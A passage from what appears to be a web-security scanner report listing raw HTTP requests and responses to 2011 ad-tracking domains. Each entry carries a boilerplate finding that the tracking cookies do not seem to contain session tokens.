anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]c-Pm=I<a8V/B>i:PSmg^W3vm%A/@8r3Ib7v=>m+B5c('NFWahIM3Tid.'cw2S@9Z$dAwm#D/YhNsF[J<3Yw68ZyGIEu._vlp(S9jjKv9Zx#gVh89rL/O_7kynysL`8KDXqIe+_76zEk@/WFM1r3INe$Nse]R5qr(JDc]-bWILQB2sBm?]5DT.u]:Zm4o)>bs>qIstFH2uSVdZOfDa#wO0R(sY4r'3M3uns400rod$m8jW.pf5$ej(%p3G.wRelFvr1B#3[<j]fLzoYV-Xoc/-u3lfOY2l0^)m+4onJH+'Mp3Z`oaUPGOSO$-([rR[3FKwxy.<d5h_99O>?lEs92JnU<Ym/AN[[N1bi!f/GpSnI+nbI[<DT:[E6Ypx.YVf>TazTBV(V/*F_VMmMdtq(6bR%^6j]b`n>tuf]8.Y_seRWLWR]!?WOOw[T0*U7h_.w+G6qub*wc[_dCF
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 06-Feb-2011 21:54:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 21:54:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 21:54:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]c-Pm=I<a8V/B>i:PSmg^W3vm%A/@8r3Ib7v=>m+B5c('NFWahIM3Tid.'cw2S@9Z$dAwm#D/YhNsF[J<3Yw68ZyGIEu._vlp(S9jjKv9Zx#gVh89rL/O_7kynysL`8KDXqIe+_76zEk@/WFM1r3INe$Nse]R5qr(JDc]-bWILQB2sBm?]5DT.u]:Zm4o)>bs>qIstFH2uSVdZOfDa#wO0R(sY4r'3M3uns400rod$m8jW.pf5$ej(%p3G.wRelFvr1B#3[<j]fLzoYV-Xoc/-u3lfOY2l0^)m+4onJH+'Mp3Z`oaUPGOSO$-([rR[3FKwxy.<d5h_99O>?lEs92JnU<Ym/AN[[N1bi!f/GpSnI+nbI[<DT:[E6Ypx.YVf>TazTBV(V/*F_VMmMdtq(6bR%^6j]b`n>tuf]8.Y_seRWLWR]!?WOOw[T0*U7h_.w+G6qub*wc[_dCF; path=/; expires=Fri, 06-May-2011 21:54:31 GMT; domain=.adnxs.com; HttpOnly Location: http://ad.yieldmanager.com/pixel?adv=95413&t=2&id=862779&id=666786&id=866803 Date: Sat, 05 Feb 2011 21:54:31 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seg?add=56500&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D966993%26t%3D2%26piggyback%3Dhttp%253A%252F%252Fwww.googleadservices.com%252Fpagead%252Fconversion%252F1030878771%252F%253Flabel%253DwJh2CPel9gEQs-zH6wM%2526amp%253Bguid%253DON%2526amp%253Bscript%253D0 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:Cbsw06/r_>(PNo/dsdulhFKS$1s!(vV#<ay/z?S_+aDM84inGc7u2rDS2.zVfL+uQn0[J!3d#weum*9[*jy.Zj.x7`vo:SHJ4I_sG7M.kwz%lFX:g=(9O<LOsM-gBXD!CJa_$L.-ARC1SuPl*u(p<pOEcF@:XJvR6`HCTmJ$j:2Vw2t1N:6hSg>f@HJ@R]mWLzbKwefWvevrk96VBPMVx:Rur'4ww:QD+5(f7JRTJUg#.vO@7qBkVu49G!Cw8S>SEFAwEGx/tTLnxS+PjhL%oZuWg9S%4dmU@eOBwGwewGg7x.jZ[Cv=@.Y')7H4K_[7s:8jt(P+HFPd4YN@NmDc3!t9tZagexo%(H43rh$$E`ntW0id[=iN2rA[0q0D:^b-'7[39d9LmUaRg`LG.JfteCRbGx8f/m3D3HD<Tre9Y!*Z>/U5lrg; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 06-Feb-2011 21:49:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 21:49:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 21:49:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:Cbsw06/r_>(PNo/dsdulhFKS$1s!(vV#<ay/z?S_+aDM84inGc7u2rDS2.zVfL+uQn0[J!3d#weum*9[*jy.Zj.x7`vo:SHJ4I_sG7M.kwz%lFX:g=(9O<LOsM-gBXD!CJa_$L.-ARC1SuPl*u(p<pOEcF@:XJvR6`HCTmJ$j:2Vw2t1N:6hSg>f@HJ@R]mWLzbKwefWvevrk96VBPMVx:Rur'4ww:QD+5(f7JRTJUg#'5Hn>Mf$DPoeIj+(UBb/RT'-+(e0HtST(7NvgCy/NzlGv!ue5qei+Vmp=QxY'-[.sh/@U6W:7+<WN$/lq+]u7CSOdM#`>w4PcOF<!T>>bfS6Jd@H0$wo[Me9i0XM:R%-#w!B7_<Qs2[31P@bSLNQrB$1[N[y:*NZTHom)%2w7oS__r*]Z8K<k8H)CkdDN!x!*>XHsqp; path=/; expires=Fri, 06-May-2011 21:49:55 GMT; domain=.adnxs.com; HttpOnly Location: http://ad.yieldmanager.com/pixel?id=966993&t=2&piggyback=http%3A%2F%2Fwww.googleadservices.com%2Fpagead%2Fconversion%2F1030878771%2F%3Flabel%3DwJh2CPel9gEQs-zH6wM%26amp%3Bguid%3DON%26amp%3Bscript%3D0 Date: Sat, 05 Feb 2011 21:49:55 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /setuid?entity=25&code=6ch47d7o8wtv HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.slackbooks.com/essentialknee Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]c-Pm=I<a8V/B>i:PSmg^W3vm%A/@8r3Ib7v=>m+B5c('NFWahIM3Tid.'cw2S@9Z$dAwm#D/YhNsF[J<3Yw68ZyGIEu._vlp(S9jjKv9Zx#gVh89rL/O_7kynysL`8KDXqIe+_76zEk@/WFM1r3INe$Nse]R5qr(JDc]-bWILQB2sBm?]5DT.u]:Zm4o)>bs>qIstFH2uSVdZOfDa#wO0R(sY4r'3M3uns400rod$m8jW.pf5$ej(%p3G.wRelFvr1B#3[<j]fLzoYV-Xoc/-u3lfOY2l0^)m+4onJH+'Mp3Z`oaUPGOSO$-([rR[3FKwxy.<d5h_99O>?lEs92JnU<Ym/AN[[N1bi!f/GpSnI+nbI[<DT:[E6Ypx.YVf>TazTBV(V/*F_VMmMdtq(6bR%^6j]b`n>tuf]8.Y_seRWLWR]!?WOOw[T0*U7h_.w+G6qub*wc[_dCF
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 06-Feb-2011 22:36:10 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 22:36:10 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 22:36:10 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]c-Pm=I<a8V/B>i:PSmg^W3vm%A/@8r3Ib7v=>m+B5c('NFWahIM3Tid.'cw2S@9Z$dAwm#D/YhNsF[J<3Yw68ZyGIEu._vlp(S9jjKv9Zx#gVh89rL/O_7kynysL`8KDXqIe+_76zEk@/WFM1r>XmoaYwfT>MaC9F3'@R)b+7/JAm!4$Z$J[)Xs%mpEI_OXEMI#3V8`vbdfy1tOnbaoJ3^ud^C@Q*e<Iyr)#(+Tg6wsA28?%iN0w93NPILtzptUr-G#'csDyV.cfuJDUw9rPkg=:/O)Q?WwIBGi0yY]E5tE_X3Cv=-F%rw+e:SY5$b0gwbe8)$@SH#%)#y<Vzz_ePJ?/BRyEUS#'J#!.$DD2PP9?oe?P+5+<^TJZ_71>/AF_w>M_7BQ$:U=wcjwaYgA6+2x+7Wsqjl^o2[dMS2Eb.K:w!W#9E)!v'vIAAa=SMsTjRRn@)*DB/x>Z; path=/; expires=Fri, 06-May-2011 22:36:10 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Sat, 05 Feb 2011 22:36:10 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Segment.aspx?sid=09702beb-9542-4386-99e6-df305b62b1f7 HTTP/1.1 Host: idcs.interclick.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T=1; uid=u=288a8646-9d10-4b7b-b3df-da84333799f7; tpd=e20=1299342742748&e90=1297355542778&e100=1296677943305; sgm=9583=734162&8278=734163&8069=734170&7596=734172&6159=734172&10272=734172
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 70 Content-Type: image/gif Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: sgm=9583=734162&8278=734163&8069=734172&7596=734172&6159=734172&10272=734172; domain=.interclick.com; expires=Fri, 05-Feb-2021 21:50:15 GMT; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI" Date: Sat, 05 Feb 2011 21:50:14 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=2725&tpd=CAESEH83n07tNVfjJL0v2PBkqF8&cver=1 HTTP/1.1 Host: idpix.media6degrees.com Proxy-Connection: keep-alive Referer: http://www.slackbooks.com/essentialknee Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt11ucvexzt11txepxzt11txepxzt11ucve; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1ucve01010030608207; orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; rdrlst=41507dpletz4d0000000w10030o2ylebnns0000001010030mmnlebnns00000010100310e5lg1nei00000006100310rdlg1vir0000000510030xo1lebnns0000001010030x1blebnns0000001010030eh5lf17qf0000000s100306bylemlne0000000y10030w3clebnns00000010100307gmlebnns0000001010030jv6lebnns0000001010030j4ilew2e20000000u10030xthlebnns0000001010030fullf8gij0000000o100310f6lg1nei0000000610031196lfzx0l00000007100300c9lfk1rn0000000l10030jillebnns0000001010031194lg3y5y0000000410030fuqlegh2b0000000z10030b6mlf17qk0000000r10030mz1lebnns0000001010030cajlfk1rn0000000l10030p7vlebnns00000010100307vglfk1rn0000000l10031192lg5l2h0000000310030xvslebnns00000010100310ellg1nei0000000610030xuklebnns0000001010030x1jlebnns0000001010030jk7lebnns0000001010030cbnlfk1rn0000000l10030yiplebnns00000010100310telg60j60000000110010yh0lebnns0000001010030xwflebnns0000001010030e4vlebnns00000010100310e9lg1nei0000000610030jwblfk1rn0000000l10030xwblebnns000000101003; sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo0000000q10030608207ag2leqh191fjhx00x1003060820782gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns1ucve00z100006002005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0mb4o00m10030608207820lebnns181qq00e0l000400100b0olfjpei0mb4o00m10030608207ab4lebnns1ucve010100306082079szlebnns1ucve010100306082078wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1pjgv00z10030608207al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns1ucve00k100006002007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei0mb4o00m10030608207b08lfjpei0mb4o00m1003060820740slebnns181qq00e0l00040010045mlfdxmc0000000n10030608207a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns1ucve00f100106012019atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; vstcnt=3lebnns030r034nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l3ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4jaec12011ucve1l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4fhux122u000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru000000000000000000000000000000000004esx7120104tej1o018EstvP2qn112s1o9ct1oa791oa5w1oa8b1oa601oa8j1oa6z1oa871oa6u1oa8f1oa7b1oa7l1oa6x1oa8l1oa6m1oa7i1oa8h1oa6h1oa8e1oa5z1oa8s1oa7n1oa6e1oa7k1oa741oa5r1oa7h1oa5l1oa5k1oa611oa7w1oa8g1oa911oa7o1oa5m1oa6l1oa681oa8c1oa5h1oa831oa8o1oa8n1oa7f1oa6f1oa7x1oa721oa771oa701oa7j1oa7a1oa801oa7g1oa6n1oa761oa5t1oa8i1oa841oa8t1oa8m1oa7y1oa921oa5i1oa6y1oa931oa821oa7u1oa941oa8d1oa631oa6t1oa651oa7d1oa8v1oa6j1oa891oa6w1oa5j1oa881oa7t1oa6v1oa7s1oa8z1oa8p1oa811oa6o1oa8u1oa691oa731oa5q1oa6g1oa8q1oa7e1oa5y1oa751oa5s1oa641oa7v1oa781oa5v1oa6k
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Set-Cookie: clid=2lebnns011706ch47d7o8wtv1udrf01110040609208; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Set-Cookie: orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Set-Cookie: rdrlst=4150o2ylebnns00000011100407dpletz4d0000000x100410e5lg1nei0000000710040mmnlebnns00000011100410rdlg1vir0000000610040x1blebnns0000001110040xo1lebnns0000001110040eh5lf17qf0000000t100406bylemlne0000000z10040w3clebnns00000011100407gmlebnns0000001110040jv6lebnns0000001110040j4ilew2e20000000v10040xthlebnns0000001110040fullf8gij0000000p100410f6lg1nei0000000710041196lfzx0l00000008100400c9lfk1rn0000000m10040jillebnns0000001110041194lg3y5y0000000510040fuqlegh2b0000001010040b6mlf17qk0000000s10040mz1lebnns0000001110040cajlfk1rn0000000m10040p7vlebnns00000011100407vglfk1rn0000000m10040xvslebnns0000001110041192lg5l2h00000004100410ellg1nei0000000710040xuklebnns0000001110040jk7lebnns0000001110040x1jlebnns0000001110040yiplebnns0000001110040cbnlfk1rn0000000m10040xwflebnns0000001110040yh0lebnns00000011100410telg60j60000000210020e4vlebnns00000011100410e9lg1nei0000000710040xwblebnns0000001110040jwblfk1rn0000000m1004; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo0000000r1004060920882gletz4d0pqa500a0l000400100ag2leqh191fkdy00y1004060920882hlebnns1ucve00z100006002009zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0mb4o00n10040609208820lebnns181qq00e0l000400100b0olfjpei0mb4o00n10040609208ab4lebnns1ucve011100406092089szlebnns1ucve011100406092088wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1pkcw01010040609208al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei0mb4o00n100406092088bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns1ucve00k10000600200b08lfjpei0mb4o00n1004060920840slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc0000000o1004060920840uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns1ucve00g100206022029atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=Ad-QCIPSuQEQi4DI6wM&guid=ON&script=0 Content-Length: 0 Date: Sat, 05 Feb 2011 22:35:30 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=39060_NDM_cs=tagvalue&betq=11311=420919 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Sun, 06 Mar 2011 19:31:17 GMT|am=Sun, 06 Mar 2011 19:31:17 GMT|dc=Sun, 06 Mar 2011 19:31:17 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjkxNzUyNjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=2dWTNJpwIg02FWDCdbdh1gwUwXYNI8Y4FWDCYTeh1gQ3gZYNIQTnGWDCF2ph1gAohXYNIYZ4FWDCKGeh1gwohXYNIca4FWDCiGeh1gQshXYNRC5BkDdxcL7YAwAoGO3r1JQcKaYWGKWAI9YBTO53CkL3Fp1gPPw6TVkfsuGB/0mxLda7FIaWGjSrMWw41ZgNkqVB6bjx1q6bBwWZGO9r4bQsMaMUwanBW8oxQ1I9GsfzFJ1sNaQQoaUds2jB1xmBI7KzHUyhGJup4jgaVZ4bySHAlBqhp4KVIYGgG+Ws+AA8UaYKyOHAhBqhpI7dAEHoGmF; F1=Bg5ZN1EBAAAABAAAAQAAgEA; BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlxM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpOvbxjp50QA8Gj3sDtziP8hByFBn7T8rVo5wGxEyQNQG!; ROLL=v5Q2Q0MzE2zqVBGrCMc3X5z2fuIiXWOzT9fCbWM!
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:31:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=3+cTNJpwIg02F9BCdbdRfgwUwX0HI8Y4F9BCYTeRfgQ3gZ0HIQTnG9BCF2pRfgAohX0HIYZ4F9BCKGeRfgwohX0HIca4F9BCiGeRfgQshX0HRC5BkDdhGL7YAwAoG11r1JQcKa0QGKWAI9Yx8N53CkL3FQ0gPPw6TVAasuGB/0mh1ca7FIaWGKRrMWw41Z8HkqVB6bjhfq6bBwWZG17r4bQsMaoOwanBW8oh60I9GsfzFwzsNaQQoawXs2jB1xmxx6KzHUyhGwsp4jgaVZUWySHAlBqRT4KVIYGgGlVs+AA8Ua0EyOHAhBqRTI7dAEHoGNErvgwNsZAc; domain=advertising.com; expires=Mon, 04-Feb-2013 22:31:19 GMT; path=/ Set-Cookie: GUID=MTI5Njk0NTA3OTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Mon, 04-Feb-2013 22:31:19 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Sat, 05 Feb 2011 23:31:19 GMT Content-Type: image/gif Content-Length: 49
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /load/?p=104&g=160&j=j HTTP/1.1 Host: load.exelator.com Proxy-Connection: keep-alive Referer: http://c03.adsummos.net/a/e/s21719 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSzNDUwtjK1rASUdFEc%253D; 